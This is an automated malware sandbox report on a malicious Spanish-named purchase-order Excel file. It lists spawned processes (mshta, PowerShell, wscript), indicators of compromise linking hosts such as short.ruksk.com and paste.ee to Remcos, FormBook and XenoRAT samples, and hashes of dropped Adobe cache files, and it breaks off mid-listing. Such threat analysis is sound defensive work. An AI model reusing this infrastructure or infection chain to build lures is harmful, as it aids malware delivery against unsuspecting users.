                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 2s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:30
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • GSI enabled (VBA)
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Sample name:Orden_de_Compra_Nmero_6782929219.xls
                                                    Detection:MAL
                                                    Classification:mal100.phis.troj.expl.evad.winXLS@38/51@23/3
                                                    EGA Information:
                                                    • Successful, ratio: 33.3%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 13
                                                    • Number of non-executed functions: 1
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .xls
                                                    • Changed system and user locale, location and keyboard layout to French - France
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Scroll down
                                                    • Close Viewer

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 104.17.201.1, 104.17.202.1
                                                    • Excluded domains from analysis (whitelisted): resc.cloudinary.com.cdn.cloudflare.net
                                                    • Execution Graph export aborted for target mshta.exe, PID 1972 because there are no executed function
                                                    • Execution Graph export aborted for target mshta.exe, PID 3592 because there are no executed function
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    00:57:44API Interceptor144x Sleep call for process: mshta.exe modified
                                                    00:57:50API Interceptor187x Sleep call for process: AcroRd32.exe modified
                                                    00:57:50API Interceptor220x Sleep call for process: powershell.exe modified
                                                    00:58:00API Interceptor17x Sleep call for process: wscript.exe modified
                                                    00:58:07API Interceptor43x Sleep call for process: RdrCEF.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    151.101.1.137Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                      16547.jsGet hashmaliciousMassLogger RATBrowse
                                                        #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                          nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                            1013911.jsGet hashmaliciousFormBookBrowse
                                                              http://itsecurityupdate.comGet hashmaliciousUnknownBrowse
                                                                https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                  https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174dGet hashmaliciousUnknownBrowse
                                                                    https://www.postman.com/postman-account/Get hashmaliciousUnknownBrowse
                                                                      https://pitch.com/public/f3efe39e-ece6-4e9c-abe8-1a8052876a2fGet hashmaliciousUnknownBrowse
                                                                        54.150.207.131OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                                                  FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                                                    Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                      Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                                                                                        #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                          0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            cloudinary.map.fastly.netAktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                            • 151.101.1.137
                                                                                            xxx.docGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.1.137
                                                                                            Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.193.137
                                                                                            atthings.docGet hashmaliciousRemcosBrowse
                                                                                            • 151.101.65.137
                                                                                            16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                            • 151.101.1.137
                                                                                            togiveme.docGet hashmaliciousRemcosBrowse
                                                                                            • 151.101.129.137
                                                                                            greatnew.docGet hashmaliciousRemcosBrowse
                                                                                            • 151.101.193.137
                                                                                            bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                            • 151.101.129.137
                                                                                            nicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                            • 151.101.129.137
                                                                                            #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                            • 151.101.1.137
                                                                                            short.ruksk.comOrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                            • 54.150.207.131
                                                                                            Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                                                                                            • 54.150.207.131
                                                                                            #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                            • 54.150.207.131
                                                                                            0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                            • 54.150.207.131
                                                                                            paste.eeAktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                            • 172.67.187.200
                                                                                            ithgreat.docGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.6
                                                                                            xxx.docGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.6
                                                                                            Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.6
                                                                                            NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                            • 172.67.187.200
                                                                                            fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.6
                                                                                            Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                            • 104.21.84.67
                                                                                            nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                            • 104.21.84.67
                                                                                            1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                            • 104.21.84.67
                                                                                            1013911.jsGet hashmaliciousFormBookBrowse
                                                                                            • 104.21.84.67

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.129.91
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.193.91
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.193.91
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.1.91
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.129.91
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.193.91
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.129.91
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.129.91
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.1.91
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 151.101.65.91
                                                                                            AMAZON-02USOrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 18.218.112.132
                                                                                            rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 54.99.33.239
                                                                                            rebirth.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 54.171.230.55
                                                                                            rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 35.155.250.157
                                                                                            rebirth.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 13.50.115.226
                                                                                            rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 34.242.244.192
                                                                                            rebirth.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 52.63.66.96
                                                                                            AS-COLOCROSSINGUSOrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 172.245.123.29
                                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 172.245.123.29
                                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 172.245.123.29
                                                                                            Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                                                            • 104.168.7.16
                                                                                            7056ZCiFdE.exeGet hashmaliciousRemcosBrowse
                                                                                            • 192.210.150.26
                                                                                            uIarPolvHR.exeGet hashmaliciousRemcosBrowse
                                                                                            • 192.210.150.26
                                                                                            IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                                                                            • 192.210.150.26
                                                                                            meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                                                            • 104.168.61.38
                                                                                            CGDL.docGet hashmaliciousUnknownBrowse
                                                                                            • 192.3.172.208
                                                                                            seemejkiss.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                            • 107.175.113.196

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            05af1f5ca1b87cc9cc9b25185115607dPayment Confirmation..docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 151.101.1.137
                                                                                            Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.1.137
                                                                                            Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                                                            • 151.101.1.137
                                                                                            Estado de cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.1.137
                                                                                            Estado_de_cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.1.137
                                                                                            atthings.docGet hashmaliciousRemcosBrowse
                                                                                            • 151.101.1.137
                                                                                            PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 151.101.1.137
                                                                                            FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.1.137
                                                                                            greatnew.docGet hashmaliciousRemcosBrowse
                                                                                            • 151.101.1.137
                                                                                            fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.1.137
                                                                                            7dcce5b76c8b17472d024758970a406bOrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            plb2ptcqcI.docGet hashmaliciousXenoRATBrowse
                                                                                            • 54.150.207.131
                                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            dHrrqccwkL.docGet hashmaliciousXenoRATBrowse
                                                                                            • 54.150.207.131
                                                                                            zVUq6L4FrV.docGet hashmaliciousXenoRATBrowse
                                                                                            • 54.150.207.131
                                                                                            Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                                                            • 54.150.207.131
                                                                                            Estado de cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            Estado_de_cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            Microsoft.docGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):270336
                                                                                            Entropy (8bit):0.0018885380473555064
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE+/c/ll:/M/xT02zkll
                                                                                            MD5:6C5E32A74F994CDF9BA610A99972FA44
                                                                                            SHA1:1EC094D5326F882E227CDD9F9D160346FC7A9C60
                                                                                            SHA-256:1F80C86D694F8EAA7A1EFB05EA60FAE2A7C8B7D37D0B455AEFCCB7E17D925DBC
                                                                                            SHA-512:7FD09578AE600B7861022F621C18BFC1399B0161AADC3B81B8A3A062B7A80D06966E2C56071F140BB8A7F850E822ED57C2B188DFF20650950F151A0BE183CBE6
                                                                                            Malicious:false
                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.156700048567531
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7R4UCQyq2PP2nKuAl9OmbnIFUt8OR4mBG1Zmw+OR4mBQRkwOP2nKuAl9OmbjLJ:7HCQyvWHAahFUt8OrBg/+OrBQR57HAae
                                                                                            MD5:3DCC9691DF6DFD5524BCB156289FF013
                                                                                            SHA1:2DDBF0114A86BABD152FAEEC15DA0234214B29AF
                                                                                            SHA-256:74D442188E8CFAD39ED9FE37608894F3786CDC05F983BF1CD466EB55034999CA
                                                                                            SHA-512:5C3214AFD441642E2A2329044E1CDDB722C351B900A200DEC735551B6A4AD2D7A6AF9F3A68293A26B545B33DBD1A04B6FB02DB9D7CD673142B8998024E52FB82
                                                                                            Malicious:false
                                                                                            Preview:2024/12/10-00:58:10.526 1412 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-00:58:10.529 1412 Recovering log #3.2024/12/10-00:58:10.529 1412 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.156700048567531
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7R4UCQyq2PP2nKuAl9OmbnIFUt8OR4mBG1Zmw+OR4mBQRkwOP2nKuAl9OmbjLJ:7HCQyvWHAahFUt8OrBg/+OrBQR57HAae
                                                                                            MD5:3DCC9691DF6DFD5524BCB156289FF013
                                                                                            SHA1:2DDBF0114A86BABD152FAEEC15DA0234214B29AF
                                                                                            SHA-256:74D442188E8CFAD39ED9FE37608894F3786CDC05F983BF1CD466EB55034999CA
                                                                                            SHA-512:5C3214AFD441642E2A2329044E1CDDB722C351B900A200DEC735551B6A4AD2D7A6AF9F3A68293A26B545B33DBD1A04B6FB02DB9D7CD673142B8998024E52FB82
                                                                                            Malicious:false
                                                                                            Preview:2024/12/10-00:58:10.526 1412 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-00:58:10.529 1412 Recovering log #3.2024/12/10-00:58:10.529 1412 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF57869e.TMP (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.156700048567531
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7R4UCQyq2PP2nKuAl9OmbnIFUt8OR4mBG1Zmw+OR4mBQRkwOP2nKuAl9OmbjLJ:7HCQyvWHAahFUt8OrBg/+OrBQR57HAae
                                                                                            MD5:3DCC9691DF6DFD5524BCB156289FF013
                                                                                            SHA1:2DDBF0114A86BABD152FAEEC15DA0234214B29AF
                                                                                            SHA-256:74D442188E8CFAD39ED9FE37608894F3786CDC05F983BF1CD466EB55034999CA
                                                                                            SHA-512:5C3214AFD441642E2A2329044E1CDDB722C351B900A200DEC735551B6A4AD2D7A6AF9F3A68293A26B545B33DBD1A04B6FB02DB9D7CD673142B8998024E52FB82
                                                                                            Malicious:false
                                                                                            Preview:2024/12/10-00:58:10.526 1412 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-00:58:10.529 1412 Recovering log #3.2024/12/10-00:58:10.529 1412 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):131072
                                                                                            Entropy (8bit):0.005597679101775777
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ImtVOM1xVlt/XSxdltIt/l:IiVfxlKxdXI1l
                                                                                            MD5:FD55D575475A6BD81B055F46FA34BA8B
                                                                                            SHA1:289A6344929F221E19D2F9097A5907FE42C03855
                                                                                            SHA-256:261CE45767DBF1E61AAF67C5EC1D75C2FF5C02681DF96897D5B0EC56A0F8C2AB
                                                                                            SHA-512:F2247D89C3268E838AE6F4BCDC1C4BB9C60E4F2E05B1763CD152811661A00B8BFC467F71009894676E38CE31229DF35F6FC9F2F19C2911698012D0594697F098
                                                                                            Malicious:false
                                                                                            Preview:VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):536
                                                                                            Entropy (8bit):5.169975207806005
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:T4RF0OidRuMgxg6dxs3yBFTtDcQAzidRuOPgxg601s3yBFDHpcR:kwOid8HxPs3yTTtyid8OPgx4s3yTDHk
                                                                                            MD5:B8D5CFADEFDDE17A6177F53C132EABA3
                                                                                            SHA1:1757EAA7D8F72C98FF9C23842A1C1A164B2F3C7A
                                                                                            SHA-256:02BAE4304F4B3FFC6524DF61E484E8C2290F667E367BE3CCDF2EDE3531C97CC3
                                                                                            SHA-512:FB1B1D3896F7CA63242DB377B6FF4E9A7F727A3BB9042C97347775963C95FD03481A4513A7D7F5AB71A39258ED2AF3A83B1925D68530975BEAA4FF1B7C67E941
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.3820

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):536
                                                                                            Entropy (8bit):5.169975207806005
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:T4RF0OidRuMgxg6dxs3yBFTtDcQAzidRuOPgxg601s3yBFDHpcR:kwOid8HxPs3yTTtyid8OPgx4s3yTDHk
                                                                                            MD5:B8D5CFADEFDDE17A6177F53C132EABA3
                                                                                            SHA1:1757EAA7D8F72C98FF9C23842A1C1A164B2F3C7A
                                                                                            SHA-256:02BAE4304F4B3FFC6524DF61E484E8C2290F667E367BE3CCDF2EDE3531C97CC3
                                                                                            SHA-512:FB1B1D3896F7CA63242DB377B6FF4E9A7F727A3BB9042C97347775963C95FD03481A4513A7D7F5AB71A39258ED2AF3A83B1925D68530975BEAA4FF1B7C67E941
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):536
                                                                                            Entropy (8bit):5.169975207806005
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:T4RF0OidRuMgxg6dxs3yBFTtDcQAzidRuOPgxg601s3yBFDHpcR:kwOid8HxPs3yTTtyid8OPgx4s3yTDHk
                                                                                            MD5:B8D5CFADEFDDE17A6177F53C132EABA3
                                                                                            SHA1:1757EAA7D8F72C98FF9C23842A1C1A164B2F3C7A
                                                                                            SHA-256:02BAE4304F4B3FFC6524DF61E484E8C2290F667E367BE3CCDF2EDE3531C97CC3
                                                                                            SHA-512:FB1B1D3896F7CA63242DB377B6FF4E9A7F727A3BB9042C97347775963C95FD03481A4513A7D7F5AB71A39258ED2AF3A83B1925D68530975BEAA4FF1B7C67E941
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):9566
                                                                                            Entropy (8bit):5.225658272708332
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:0XA2P6Y6f76yx626OP6H6Q6y6nfs6ttRZ69tsu6jtG16RMX05F5yLk:0QAt0zvXkdvIfsutRZEtsuutG1gMknR
                                                                                            MD5:2E350FCDA512FFAFE08AE7B88E09374C
                                                                                            SHA1:DEB0E517C3170020C3A6AD13A901409B36167A86
                                                                                            SHA-256:3E28E24970A3E570728DBBED456D5A0061C2C823FDC31BD137B5C269F364C181
                                                                                            SHA-512:7841FC3DA6362AF2FDCB8151A7B8E7A2EA9954DEA7A459397513070A099776F46511948CC38A74B16AE902CDE302F19232089775884A2962693C101538CA8039
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426595650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.3820

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):9566
                                                                                            Entropy (8bit):5.225658272708332
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:0XA2P6Y6f76yx626OP6H6Q6y6nfs6ttRZ69tsu6jtG16RMX05F5yLk:0QAt0zvXkdvIfsutRZEtsuutG1gMknR
                                                                                            MD5:2E350FCDA512FFAFE08AE7B88E09374C
                                                                                            SHA1:DEB0E517C3170020C3A6AD13A901409B36167A86
                                                                                            SHA-256:3E28E24970A3E570728DBBED456D5A0061C2C823FDC31BD137B5C269F364C181
                                                                                            SHA-512:7841FC3DA6362AF2FDCB8151A7B8E7A2EA9954DEA7A459397513070A099776F46511948CC38A74B16AE902CDE302F19232089775884A2962693C101538CA8039
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426595650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

                                                                                            Download File
